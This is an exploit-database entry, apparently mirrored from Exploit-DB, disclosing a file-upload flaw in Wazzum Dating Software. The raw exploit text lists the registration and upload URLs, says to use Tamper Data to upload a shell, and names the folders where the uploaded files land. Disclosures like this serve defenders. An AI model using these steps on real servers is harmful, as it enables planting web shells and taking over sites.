Wazzum Dating Software Mullti Vulnerability

vendor:

Wazzum Dating Software

by:

El-Kahina

7,5

CVSS

HIGH

Upload

434

CWE

Product Name: Wazzum Dating Software

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2010

Wazzum Dating Software Mullti Vulnerability

A vulnerability in the Wazzum Dating Software allows an attacker to upload malicious files to the server. The attacker can register on the website and then use Tamper Data to upload malicious files to the server. The malicious files can be found in the includes/videos/ and includes/audios/ directories.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized before being used in any application logic.

Source

Exploit-DB raw data:

========================================================================================                  
| ( Title    ) Wazzum Dating Software Mullti Vulnerability    
| ( Author   ) El-Kahina                                                               
| ( email    ) please forgive me                                                                                                                            |
| ( Web Site ) wwww.iqs3cur1ty.com                                                                                                                                 
| ( Script   ) http://hotfile.com/dl/32756801/c6b4b5e/Wazzum.zip.html    
| ( Tested on) Lunix Français v.(9.10 Ubuntu)       
| ( Bug      ) Upload    
|                                                                  
======================      Exploit By EL-Kahina       =================================
 # Exploit  : 
 
 1 - Register - Step 1
 
 http://127.0.0.1/Wazzum/register.php?step=1&case=reg&PHPSESSID=fba9845f1d798c1bf4faf996e7789b4c
                  
 2 - Register - Step 2
 
 http://127.0.0.1/Wazzum/register.php?step=2&mode=create&case=reg (You Can Use Shell to Upload)
 
 3 - http://127.0.0.1/Wazzum//video_admin.php?type=v (2 upload video) Use Tamper Data
  
 http://127.0.0.1/Wazzum//includes/videos/ to find evil 
 
 http://127.0.0.1/Wazzum//audio_admin.php?type=a (2 upload audio) Use Tamper Data
 
 http://127.0.0.1/Wazzum//includes/audios/ to find evil
 
==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
(Dz-Ghost Team ) im indoushka's sister -#[V!va Fidal Castro]#-
--------------------------------------------------------------------------------------------------------------